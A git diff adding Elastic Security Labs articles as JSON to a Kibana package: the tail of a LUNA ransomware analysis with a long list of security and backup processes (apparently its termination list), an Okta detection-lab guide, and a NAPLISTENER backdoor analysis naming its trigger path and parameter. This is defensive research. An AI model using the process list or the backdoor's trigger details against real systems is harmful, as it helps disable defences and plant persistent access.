xenpfsvice.exenpmdagent.exenprotect.exenpscheck.exenpssvc.exenrmenctb.exenscsrvce.exensctop.exenslocollectorservice.exensmdemf
.exensmdmon.exensmdreal.exensmdsch.exensmdtr.exentcaagent.exentcadaemon.exentcaservice.exentevl.exentrtscan.exentservices.exenvcoas.exenvcsched.exenymse.exeoasclnt.exeocautoupds.exeocomm.exeocssd.exeoespamtest.exeofcdog.exeofcpfwsvc.exeokclient.exeolfsnt40.exeomniagent.exeomslogmanager.exeomtsreco.exeonenote.exeonlinent.exeonlnsvc.exeop_viewer.exeopscan.exeoracle.exeoutlook.exeoutpost.exepaamsrv.exepadfsvr.exepagent.exepagentwd.exepasystemtray.exepatch.exepatrolagent.exepatrolperf.exepavbckpt.exepavfires.exepavfnsvr.exepavjobs.exepavkre.exepavmail.exepavreport.exepavsched.exepavsrv50.exepavsrv51.exepavsrv52.exepavupg.exepaxton.net2.clientservice.exepaxton.net2.commsserverservice.exepccclient.exepccguide.exepcclient.exepccnt.exepccntmon.exepccntupd.exepccpfw.exepcctlcom.exepcscan.exepcscm.exepcscnsrv.exepcsws.exepctsauxs.exepctsgui.exepctssvc.exepctstray.exepep.exepersfw.exepmgreader.exepmon.exepnmsrv.exepntiomon.exePop3pack.exepop3trap.exepoproxy.exepowerpnt.exeppclean.exeppctlpriv.exe | ppmcativedetection.exeppppwallrun.exepqibrowser.exepqv2isvc.exepralarmmgr.exeprcalculationmgr.exeprconfigmgr.exeprdatabasemgr.exepremailengine.exepreventmgr.exeprevsrv.exeprftpengine.exeprgateway.exeprintdevice.exeprivacyiconclient.exeprlicensemgr.exeprocexp.exeproficy 
administrator.exeproficyclient.exe4proficypublisherservice.exeproficyserver.exeproficysts.exeproutil.exeprprintserver.exeprproficymgr.exeprrds.exeprreader.exeprrouter.exeprschedulemgr.exeprstubber.exeprsummarymgr.exeprunsrv.exeprwriter.exepsanhost.exepsctris.exepsctrls.exepsh_svc.exepshost.exepsimreal.exepsimsvc.exepskmssvc.exepsuamain.exepsuaservice.exepthosttr.exepview.exepviewer.exepwdfilthelp.exepxemtftp.exepxeservice.exeqclean.exeqdcsfs.exeqoeloader.exeqserver.exerapapp.exerapuisvc.exeras.exerasupd.exerav.exeravmon.exeravmond.exeravservice.exeravstub.exeravtask.exeravtray.exeravupdate.exeravxp.exercsvcmon.exerdrcef.exerealmon.exeredirsvc.exeregmech.exeremupd.exerepmgr64.exereportersvc.exereportingservicesservice.exereportsvc.exeretinaengine.exerfwmain.exerfwproxy.exerfwsrv.exerfwstub.exernav.exernreport.exerouternt.exerpcserv.exerscd.exerscdsvc.exersnetsvr.exerssensor.exerstray.exertvscan.exerulaunch.exesafeservice.exesahookmain.exesaservice.exesav32cli.exesavfmsectrl.exesavfmselog.exesavfmsesjm.exesavfmsesp.exesavfmsespamstatsmanager.exesavfmsesrv.exesavfmsetask.exesavfmseui.exesavmain.exesavroam.exesavscan.exesavservice.exesavui.exesbamsvc.exesbserv.exescan32.exescanexplicit.exescanfrm.exescanmailoutlook.exescanmsg.exescanwscs.exescfagent_64.exescfmanager.exescfservice.exescftray.exeschdsrvc.exeschupd.exesdrservice.exesdtrayapp.exeseanalyzertool.exeseccenter.exesecuritycenter.exesecuritymanager.exeseestat.exesemsvc.exeserver_eventlog.exeserver_runtime.exesesclu.exesetloadorder.exesetupguimngr.exesevinst.exesgbhp.exeshstat.exesidebar.exesiteadv.exeslee81.exesmc.exesmcgui.exesmex_activeupdasmex_master.exesmex_remoteconfsmex_systemwatcsmoutlookpack.exesms.exesmsectrl.exesmselog.exesmsesjm.exesmsesp.exesmsesrv.exesmsetask.exesmseui.exesmsx.exesnac.exesndmon.exesndsrvc.exesnhwsrv.exesnicheckadm.exesnichecksrv.exesnicon.exesnsrv.exespbbcsvc.exespideragent.exespiderml.exespidernt.exespiderui.exespntsvc.exespooler.exespyemergency.exespyemergencysrv.exesqbcoreservice.
exesqlagent.exesqlbrowser.exesqlservr.exesqlwriter.exesrvload.exesrvmon.exesschk.exessecuritymanager.exessm.exessp.exessscheduler.exestarta.exesteam.exestinger.exestopa.exestopp.exestwatchdog.exesvcgenerichostsvcharge.exesvcntaux.exesvdealer.exesvframe.exesvtray.exeswc_service.exeswdsvc.exesweepsrv.sysswi_service.exeswnetsup.exeswnxt.exeswserver.exesymlcsvc.exesymproxysvc.exesymsport.exesymtray.exesymwsc.exesynctime.exesysdoc32.exesysoptenginesvc.exetaskhostw.exetbirdconfig.exetbmon.exetclproc.exetdimon.exeteamviewer_service.exetfgui.exetfservice.exetftray.exetfun.exethebat.exethebat64.exethunderbird.exetiaspn~1.exetmas.exetmlisten.exetmntsrv.exetmpfw.exetmproxy.exetnbutil.exetnslsnr.exetoolbarupdater.exetpsrv.exetraflnsp.exetraptrackermgr.exetrjscan.exetrupd.exetsansrf.exetsatisy.exetscutynt.exetsmpnt.exeucservice.exeudaterui.exeuiseagnt.exeuiwatchdog.exeumxagent.exeumxcfg.exeumxfwhlp.exeumxpol.exeunsecapp.exeunvet32.exeup2date.exeupdate_task.exeupdaterui.exeupdtnv28.exeupfile.exeuplive.exeuploadrecord.exeupschd.exeurl_response.exeurllstck.exeuseractivity.exeuseranalysis.exeusergate.exeusrprmpt.exev2iconsole.exev3clnsrv.exev3exec.exev3imscn.exev3lite.exev3main.exev3medic.exev3sp.exev3svc.exevetmsg.exevettray.exevgauthservice.exevisio.exevmacthlp.exevmtoolsd.exevmware-converter.exevmware-converter-a.exevmwaretray.exevpatch.exevpc32.exevpdn_lu.exevprosvc.exevprot.exevptray.exevrv.exevrvmail.exevrvmon.exevrvnet.exevshwin32.exevsmain.exevsmon.exevsserv.exevsstat.exevstskmgr.exewebproxy.exewebscanx.exewebsensecontrolservice.exewebtrapnt.exewfxctl32.exewfxmod32.exewfxsnt40.exewin32sysinfo.exewinlog.exewinroute.exewinvnc4.exewinword.exewordpad.exeworkflowresttest.exewrctrl.exewrsa.exewrspysetup.exewscntfy.exewssfcmai.exewtusystemsuport.exexcommsvr.exexfilter.exexfssvccon.exezanda.exezapro.exezavcore.exezillya.exezlclient.exezlh.exezonealarm.exezoolz.exe |\n"
+ },
+ "title": "LUNA Ransomware Attack Pattern Analysis",
+ "slug": "luna-ransomware-attack-pattern",
+ "subtitle": "LUNA attack pattern and malware observations",
+ "date": "2022-08-31",
+ "description": "In this research publication, we'll explore the LUNA attack pattern — a cross-platform ransomware variant.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "dark-side-of-moon-flickr-earth-shine-thumbnail.jpeg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "luna",
+ "ref5264"
+ ]
+ },
+ "id": "security_labs_content-luna_ransomware_attack_pattern-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json
new file mode 100644
index 00000000000..194743b8960
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Monitoring Okta threats with Elastic Security\"\nsubtitle: \"Setup a detection engineering lab for Okta\"\nslug: \"monitoring-okta-threats-with-elastic-security\"\ndate: \"2024-02-23\"\ndescription: \"This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-03.png\"\ncategory:\n - slug: security-research\n---\n\n## Preamble\n\nWelcome to another installment of Okta threat research with Elastic. [Previously](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), we have published articles exploring Okta’s core services and offerings. This article is dedicated to the practical side of cyber defense - setting up a robust Okta threat detection lab. Our journey will navigate through the intricacies of configuring a lab environment using the Elastic Stack, integrating SIEM solutions, and seamlessly connecting with Okta.\n\nThe goal of this article is not just to inform but to empower. Whether you're a seasoned cybersecurity professional or a curious enthusiast, our walkthrough aims to equip you with the knowledge and tools to understand and implement advanced threat detection mechanisms for Okta environments. We believe that hands-on experience is the cornerstone of effective cybersecurity practice, and this guide is crafted to provide you with a practical roadmap to enhance your security posture.\n\nAs we embark on this technical expedition, remember that the world of cybersecurity is dynamic and ever-evolving. The methods and strategies discussed here are a reflection of the current landscape and best practices. 
We encourage you to approach this guide with a mindset of exploration and adaptation, as the techniques and tools in cybersecurity are continually advancing.\n\nSo, let's dive into our detection lab setup for Okta research.\n\n## Prerequisites\n\nFor starters, an Okta license (a [trial license](https://www.okta.com/free-trial/) is fine) is required for this lab setup. This will at least allow us to generate Okta system logs within our environment, which we can then ingest into our Elastic Stack.\n\nSecondarily, after Okta is set up, we can deploy a Windows Server, set up Active Directory (AD), and use the [AD integration](https://help.okta.com/en-us/content/topics/directory/ad-agent-main.htm) in Okta to sync AD with Okta for Identity and Access Management (IAM). This step is not necessary for the rest of the lab, however, it can help extend our lab for other exercises and scenarios where endpoint and Okta data are both necessary for hunting.\n\n## Sign up for Okta Workforce Identity\n\nWe will set up a fresh Okta environment for this walkthrough by signing up for a Workforce Identity Cloud trial. If you already have an Okta setup in your environment, then feel free to skip to the `Setting Up the Elastic Stack` section.\n\nOnce signed up for the trial, you are typically presented with a URL containing a trial license subdomain and the email to log into the Okta admin console.\n\nTo start, users must pivot over to the email they provided when signing up and follow the instructions of the activation email by Okta, which contains a QR code to scan. \n\nThe QR code is linked to the Okta Verify application that is available on mobile devices, iOS and Android. A prompt on the mobile device for multi-factor authentication (MFA) using a phone number and face recognition is requested. 
\n\n\n\n_Image 1: Setting up Okta Verify through a mobile device_\n\nOnce set up, we are redirected to the Okta admin console to configure MFA using Okta Verify.\n\n\n\n_Image 2: The Okta Admin console_\n\nAt this point, you should have a trial license for Okta, have setup MFA, and have access to the Okta admin console.\n\n## Setting up your free cloud stack\n\nFor this lab, we will use a [free trial](https://cloud.elastic.co/registration) of an Elastic Cloud instance. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html), or Microsoft Azure if you’d like to set up your stack in an existing cloud service provider (CSP). Ensure you [enable MFA for your Elastic Cloud environment](https://www.elastic.co/guide/en/cloud/current/ec-account-user-settings.html#ec-account-security-mfa).\n\nOnce registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment okta-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:\n\n - Name: okta-threat-detection\n - Cloud provider: Google Cloud\n - Region: Iowa (us-central1)\n - Hardware profile: Storage optimized\n - Version: 8.12.0 (latest)\n\nThe option to adjust additional settings for Elasticsearch, Kibana, Integrations, and more is configurable during this step. However, default settings are fine for this lab exercise. 
If you choose to leverage the Elastic Stack for a more permanent, long-term strategy, we recommend planning and designing architecturally according to your needs.\n\nOnce set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP (or whatever cloud provider you selected). You can download the displayed credentials as a CSV file or save them wherever you see fit. The deployment takes approximately 5 minutes to complete and once finished, you can select “Continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!\n\n\n\n_Image 3: Your newly deployed Elastic stack_\n\n## Setup Fleet from the Security Solution\n\nAs a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation and management of an agent policy, which will incorporate the [Okta integration](https://docs.elastic.co/en/integrations/okta) on an Elastic Agent. This integration is used to access and ingest Okta logs into our stack.\n\n### Create an Okta policy\n\nFor our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy we’re naming Okta.\n\nTo set up a fleet policy within your Elastic Stack, do the following in your Elastic Stack:\n\n 1. Navigation menu > Management > Fleet > Agent Policies > Create agent policy\n 2. 
Enter “Okta” as a name > Create Agent Policy\n\n\n\n_Image 4: Fleet agent policies page in Elastic Stack_\n\n## Setup the Okta integration\n\nOnce our policy is established, we need to install the Okta integration for the Elastic Stack we just deployed.\n\nBy selecting the “Okta” name in the agent policies that was just created, we need to add the Okta integration by selecting “Add integration” as shown below.\n\n\n\n_Image 5: The Okta integration within the agent policies_\n\nTyping “Okta” into the search bar will show the Okta integration that needs to be added. Select this integration and the following prompt should appear.\n\n\n\n_Image 6: The Okta Integration page_\n\nBy selecting “Add Okta” we can now begin to set up the integration with a simple step-by-step process, complimentary to adding our first integration in the Elastic Stack.\n\n\n\n_Image 7: Adding integrations into the Elastic Stack_\n\n## Install the Elastic Agent on an endpoint\n\nAs previously mentioned, we have to install at least one agent on an endpoint to access data in Okta, associated with the configured Okta policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP, to keep everything in the same environment. For this publication, I will use a VM instance of [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM in Google’s Compute Engine (GCE). Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic Agent.\n\nSelect the “Install Elastic Agent” button and select which host the agent will be installed on. For this example, we will be using a Linux host. Once selected, a “Copy” option is available to copy and paste the commands into your Linux console, followed by execution.\n\n\n\n_Image 8: Install Elastic Agent_\n\n## Create an Okta token\nAt this point, we need an API key and an Okta system logs API URL for the integration setup. 
Thus, we must pivot to the Okta admin console to create the API token.\n\n\n\n_Image 9: Access the Okta Admin console_\n\nFrom the Okta admin console, select the following:\n\n 1. Security > API > Tokens\n 2. Select the “Create token” button\n\nIn this instance, we name the API token “elastic”. Since my administrator account creates the token, it inherits the permissions and privileges of my account. In general, we recommend creating a separate user and scoping permissions properly with principle-of-least-privilege (PoLP) for best security practices. I recommend copying the provided API token key to the clipboard, as it is necessary for the Okta integration setup.\n\n\n\n_Image 10: Copy your API token_\n\nWe also need to capture the Okta API Logs URL, which is our HTTPS URL with the URI ```/api/v1/logs``` or system logs API endpoint.\n\nFor example: ```https://{okta-subdomain}.okta.com/api/v1/logs```\n\nThe Elastic Agent, using the Okta integration, will send requests to this API URL with our API token included in the authorization header of the requests as a Single Sign-On for Web Systems (SSWS) token. With this information, we are ready to finalize our Okta integration setup in the Elastic Stack.\n\n## Add Okta integration requirements\n\nPivoting back to the Okta integration setup in the Elastic Stack, it requires us to add the API token and the Okta System logs API URL as shown below. Aside from this, we change the “Initial Interval” from 24 hours to 2 minutes. This will help check for Okta logs immediately after we finish our setup.\n\n\n\n_Image 11: Configure log collection_\n\nOnce this information is submitted to the Okta integration setup, we can select the “Confirm incoming data” button to verify that logs are properly being ingested from the Elastic Agent.\n\n\n\n_Image 12: Preview data from Okta_\n\nWhile we have confirmed that data is in fact being ingested from the Elastic Agent, we must also confirm that we have Okta-specific logs being ingested. 
I would suggest that you take a moment to pivot back to Okta and change some settings in the admin console. This will then generate Okta system logs that will eventually be extracted by our Elastic Agent and ingested into our Elastic Stack. Once completed, we can leverage the Discover feature within Kibana to search for the Okta system logs that should have been generated.\n\nThe following query can help us accomplish this - ```event.dataset:okta*```\n\n\n\n_Image 13: Use Discover to explore your Okta data_\n\nIf you have managed to find Okta logs from this, then congratulations rockstar, you have successfully completed these steps:\n\n 1. Signed up for Okta Workforce Identity with a trial license\n 2. Deployed a trial Elastic stack via cloud.elastic.co\n 3. Deployed an agent to your host of choice\n 4. Created an Okta policy\n 5. Setup the Okta integration\n 6. Created an Okta API token\n 7. Confirmed incoming data from our Elastic agent\n\n## Enable Okta detection rules\n\nElastic has 1000+ pre-built detection rules not only for Windows, Linux, and macOS endpoints, but also for several integrations, including Okta. You can view our current existing Okta [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta) and corresponding MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-oktaWILDCARD.json&leave_site_dialog=false&tabs=false).\n\nTo enable Okta rules, complete the following in the Elastic Stack:\n\n 1. Navigation menu > Security > Manage > Rules\n 2. Select “Load Elastic prebuilt rules and timeline templates”\n 3. Once all rules are loaded:\n a. Select “Tags” dropdown\n b. Search “Okta”\n c. 
Select all rules > Build actions dropdown > Enable\n\n\n\n_Image 14: Searching for Out-of-the-Box (OOB) Okta Detection Rules_\n\nWhile we won’t go in-depth about exploring all rule information, we recommend [doing so](https://www.elastic.co/guide/en/security/current/detection-engine-overview.html). Elastic has additional information, such as related integrations, investigation guides, and much more! Also, you can add to our community by [creating your own](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) detection rule with the “Create new rule” button and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) it to our detection rules repository.\n\n## Let’s trigger a pre-built rule\n\nAfter all Okta rules have been enabled, we can now move on to testing alerts for these rules with some simple emulation.\n\nFor this example, let’s use the [Attempt to Reset MFA Factors for an Okta User Account](https://github.com/elastic/detection-rules/blob/main/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) detection rule that comes fresh out-of-the-box (OOB) with prebuilt detection rules.\n\n\n\n_Image 15: Enabling an OOB Okta detection rule to test alerting_\n\nTo trigger, we simply log into our Okta admin console and select a user of choice from Directory > People and then More Actions > Reset Multifactor > Reset All.\n\n\n\n_Image 16: Resetting MFA for a user in Okta_\n\nOnce complete, logs will be ingested shortly into the Elastic Stack, and the Detection Engine will run the rule’s query against datastreams whose patterns match ```logs-okta*```. If all goes as expected, an alert should be available via the Security > Alerts page in the Elastic stack.\n\n\n\n_Image 17: Alert page flyout for triggered OOB Okta detection rule_\n\n## Let’s trigger a custom rule\n\nIt is expected that not all OOTB Okta rules may be right for your environment or detection lab. 
As a result, you may want to create custom detection rules for data from the Okta integration. Allow me to demonstrate how you would do this.\n\nLet’s assume we have a use case where we want to identify when a unique user ID (Okta Actor ID) has an established session from two separate devices, indicating a potential web session hijack.\n\nFor this, we will rely on Elastic’s piped query language, [ES|QL](https://www.elastic.co/blog/getting-started-elasticsearch-query-language). We can start by navigating to Security > Detection Rules (SIEM) > Create new rules. We can then select ES|QL as the rule type.\n\n\n\n_Image 18: Create new rule Kibana page in Elastic security solution_\n\nTo re-create Okta system logs for this event, we would log in to Okta with the same account from multiple devices relatively quickly. For replication, I have done so via macOS and Windows endpoints, as well as my mobile phone, for variety.\n\nThe following custom ES|QL query would identify this activity, which we can confirm via Discover in the Elastic Stack before adding it to our new rule.\n\n\n\n_Image 19: Testing ES|QL query in Elastic Discover prior to rule implementation_\n\nNow that we have adjusted and tested our query and are happy with the results, we can set it as the query for our new rule.\n\n\n\n_Image 20: Creating new custom detection rule with ES|QL query logic_\n\n\n\n_Image 21: Enabled custom detection rule with ES|QL query for Okta threat_\n\nNow that our rule has been created, tested, and enabled, let’s attempt to fire an alert by replicating this activity. 
For this, we simply log into our Okta admin console with the same user account from multiple devices.\n\nAs we can see, we now have an alert for this custom rule!\n\n\n\n_Image 22: Triggered alert for events matching custom detection rule_\n\n## Bonus: synchronize Active Directory (AD)\n\nAs discussed in our [previous Okta installment](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), a core service offering in Okta is to synchronize with third-party IAM directory services such as AD, Google Workspace, and others. Doing so in your lab can enable further threat detection capabilities, as cross-correlation between Windows logs and Okta user activity becomes possible. For this article, we will step through synchronizing with AD on a local Windows Server. Note - We recommend deploying a Windows Elastic Agent to your Windows Server and setting up the [Windows](https://docs.elastic.co/en/integrations/windows) and [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integrations for additional log ingestion.\n\n 1. [Set up](https://www.linkedin.com/pulse/how-install-active-directory-domain-services-windows-server-2019-/) your Windows Server (we are using WinServer 2019)\n 2. Deploy the Okta AD agent from your Okta admin console\n a. Directory > Directory Integrations\n b. Add Directory > Add Active Directory\n 3. Walk through guided steps to install the Okta AD agent on the Windows Server\n a. Execution of the Okta Agent executable will require a setup on the Windows Server side as well\n 4. Confirm the Okta AD agent was successfully deployed\n 5. Synchronize AD with Okta\n a. Directory > Directory Integrations\n b. Select the new AD integration\n c. Select “Import Now”\n d. Choose incremental or full import\n 6. 
Select which users and groups to import and import them\n\n\n\n_Image 23: Successful Okta agent deployment and synchronization with AD_\n\nOnce finished, under Directory in the Okta admin console, you should see people and groups that have been successfully imported. From here, you can emulate attack scenarios such as stolen login credentials locally (Windows host) being used to reset MFA in Okta.\n\n## Additional considerations\n\nWhile this is a basic setup of not only the Elastic Stack, Okta integration, and more for a threat research lab, there are additional considerations for our setup that are dependent on our research goals. While we won't dive into specifics nor exhaust possible scenarios, below is a list of considerations for your lab to accurately emulate an enterprise environment and/or adversary playbooks:\n\n - Is Okta my IdP source of truth? If not, set up a third party such as Azure AD (AAD) or Google Workspace and synchronize directory services.\n - Will I simulate adversary behavior - for example, SAMLjacking? If so, what third-party integrations do I need that leverage SAML for authentication?\n - Do I want to research tenant poisoning? 
If so, should I set up a multi-tenant architecture with Okta?\n - Do I need separate software, such as VPNs or proxies, to emulate attribution evasion when attempting to bypass MFA?\n - What other tools, such as EvilGinx, let me attempt phishing playbooks, and what is the required setup in Okta for these exercises?\n - How should I capture authorization codes during OAuth workflows, and how can I replay an exchange request for an access token?\n - For password spraying or credential stuffing, which third-party applications should I integrate, and how many should suffice for accurate detection logic?\n - How might I explore lax access policies for user profiles?\n\n## Takeaways\n\nIn this guide, we've successfully navigated the setup of an Okta threat detection lab using the Elastic Stack, highlighting the importance of safeguarding SaaS platforms like Okta. Our journey included deploying the Elastic Stack, integrating and testing Okta system logs, and implementing both pre-built and custom detection rules.\n\nThe key takeaway is the Elastic Stack's versatility in threat detection, accommodating various scenarios and enhancing cybersecurity capabilities. This walkthrough demonstrates that effective threat management in Okta environments is both achievable and essential.\n\nAs we wrap up, remember that the true value of this exercise lies in its practical application. By establishing your own detection lab, you're not only reinforcing your security posture but also contributing to the broader cybersecurity community. Stay tuned for additional threat research content surrounding SaaS and Okta, where we'll explore common adversary attacks against Okta environments and detection strategies.\n\n"
+ },
+ "title": "Monitoring Okta threats with Elastic Security",
+ "slug": "monitoring-okta-threats-with-elastic-security",
+ "subtitle": "Setup a detection engineering lab for Okta",
+ "date": "2024-02-23",
+ "description": "This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-03.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-monitoring_okta_threats_with_elastic_security-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json
new file mode 100644
index 00000000000..9110259f113
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-naplistener_more_bad_dreams_from_the_developers_of_siestagraph-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"NAPLISTENER: more bad dreams from developers of SIESTAGRAPH\"\nslug: \"naplistener-more-bad-dreams-from-the-developers-of-siestagraph\"\ndate: \"2023-06-27\"\ndescription: \"Elastic Security Labs observes that the threat behind SIESTAGRAPH has shifted priorities from data theft to persistent access, deploying new malware like NAPLISTENER to evade detection.\"\nauthor:\n - slug: remco-sprooten\nimage: \"blog-thumb-filtered-lens.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - malware analysis\n - naplistener\n - siestagraph\n---\n\n### Introduction\n\nWhile continuing to monitor the [REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) activity group, Elastic Security Labs observed that the attacker shifted priorities from data theft to persistent access using several mechanisms. On January 20, 2023, a new executable `Wmdtc.exe` was created and installed as a Windows Service using a naming convention similar to the legitimate binary used by the Microsoft Distributed Transaction Coordinator service ( `Msdtc.exe` ).\n\n`Wmdtc.exe` is an HTTP listener written in C#, which we refer to as NAPLISTENER. Consistent with SIESTAGRAPH and other malware families developed or used by this threat, NAPLISTENER appears designed to evade network-based forms of detection. _Notably, network- and log-based detection methods are common in the regions where this threat is primarily active (southern and southeastern Asia)._\n\n### Analysis\n\nThis unique malware sample contains a C# class called `MsEXGHealthd` that consists of three methods: `Main` , `SetRespHeader` , and `Listener`. This class establishes an HTTP request listener that can process incoming requests from the Internet, and respond accordingly by filtering malware commands and transparently passing along legitimate web traffic. 
This class is depicted in the following image:\n\n\n\n### Malware analysis\n\nThe `Main` method is invoked when the program runs and creates a thread object, which will be used by the `Listener` method. The thread is then put to sleep for 0 milliseconds, and then started. Implementing a sleep capability is consistent with SIESTAGRAPH, NAPLISTENER, and other malware developed or used by this group.\n\nThe `SetRespHeader` method sets the response headers for the HTTP response. It takes an `HttpListenerResponse` object as a parameter and defines headers such as `Server` , `Content-Type` , and `X-Powered-By`. In one aggressively-targeted victim environment, the IIS web server returns a 404 response with a `Server` header containing `Microsoft-IIS/10.0` as seen below, unless specific parameters are present:\n\n\n\nHowever, the 404 error when requesting the listener URI adds `Content-Type: text/html; charset=utf-8` as an extra header. When NAPLISTENER is installed, the string `Microsoft-HTTPAPI/2.0` is appended to the Server header. This behavior makes the listener detectable and does not generate a 404 error. It is likely this filtering methodology was chosen to avoid discovery by web scanners and similar technologies.\n\nDefenders may instinctively search for these errors in IIS web server logs, but the NAPLISTENER implant functions inline and Windows will redirect these requests to the registered application, allowing the malware to ensure those errors never reach the web server logs where analysts may see them. Additionally, security tools that ingest web server logs will not have an opportunity to identify these behaviors.\n\n\n\nThe `Listener` method is where most of the work happens for NAPLISTENER.\n\nFirst, this method creates an `HttpListener` object to handle incoming requests. If `HttpListener` is supported on the platform being used (which it should be), it adds a prefix to the listener and starts it.\n\nOnce running, it waits for incoming requests. 
When a request comes in, it reads any data that was submitted (stored in a `Form` field), decodes it from Base64 format, and creates a new `HttpRequest` object with the decoded data. It creates an `HttpResponse` object and an `HttpContext` object, using these two objects as parameters. If the submitted Form field contains `sdafwe3rwe23` , it will try to create an assembly object and execute it using the `Run` method.\n\nThis means that any web request to `/ews/MsExgHealthCheckd/` that contains a base64-encoded .NET assembly in the `sdafwe3rwe23` parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and is not directly associated with the running IIS server.\n\nIf that fails for some reason (e.g., invalid or missing data), then a \"404 Not Found\" response will be sent with an empty body instead. After either response has been sent, the stream is flushed and the connection closed before looping back to wait for more incoming requests.\n\n### Proof-of-concept prerequisites\n\n_Attention: Please remember that this is meant as a proof-of-concept to illustrate how NAPLISTENER must be prepared for a target environment: it should not be deployed in production environments for any reason._\n\nIn order to properly run NAPLISTENER, an SSL certificate must be generated and the application registered to use it on a target endpoint. A general example of generating a self-signed certificate resembles the following commands:\n\n\n\nThe adversary then needs to import the `certificate.pfx` object into the Windows certificate store, as depicted in the following image:\n\n\n\nEach certificate contains a thumbprint, and the following screen capture depicts an example certificate:\n\n\n\nThe thumbprint value is necessary to register the application as seen in the following command:\n\n\n\nThe adversary needs to replace the `certhash` value with the thumbprint from their certificate. 
The `appid` is the GUID of the sample application ID. Once the environment is properly configured, the sample can be run from any privileged terminal.\n\nThe following python script created by Elastic Security Labs demonstrates one method that can then be used to trigger NAPLISTENER. The payload in this example is truncated for readability, and may be released at a later time when the industry has better ability to detect this methodology.\n\n\n\nIn our PoC, running the python script results in a harmless instance of `calc.exe`.\n\n\n\n### Resources\n\nElastic Security Labs has published a NAPLISTENER signature to the open protections artifact repository [here](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_NapListener.yar).\n\n### Sources\n\nCode similarity analyses are an important part of our process. During our investigation of NAPLISTENER, we identified a public [GitHub repository](https://github.com/A-D-Team/SharpMemshell/blob/main/HttpListener/memshell.cs) that contains a similar project. Similar logic and identical debugging strings are present in both pieces of code, and we assess that `SharpMemshell` may have inspired the threat responsible for NAPLISTENER.\n\n### Key takeaways\n\n- The attacker has shifted their focus from data theft to establishing persistent access using new malware including NAPLISTENER, an HTTP listener written in C#\n- NAPLISTENER creates an HTTP request listener that can process incoming requests from the internet, reads any data that was submitted, decodes it from Base64 format, and executes it in memory\n- NAPLISTENER is designed to evade network-based detection methods by behaving similarly to web servers\n- The attacker relies on code present in public repositories for a variety of purposes, and may be developing additional prototypes and production-quality code from open sources\n"
+ },
+ "title": "NAPLISTENER: more bad dreams from developers of SIESTAGRAPH",
+ "slug": "naplistener-more-bad-dreams-from-the-developers-of-siestagraph",
+ "date": "2023-06-27",
+ "description": "Elastic Security Labs observes that the threat behind SIESTAGRAPH has shifted priorities from data theft to persistent access, deploying new malware like NAPLISTENER to evade detection.",
+ "author": [
+ {
+ "slug": "remco-sprooten"
+ }
+ ],
+ "image": "blog-thumb-filtered-lens.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
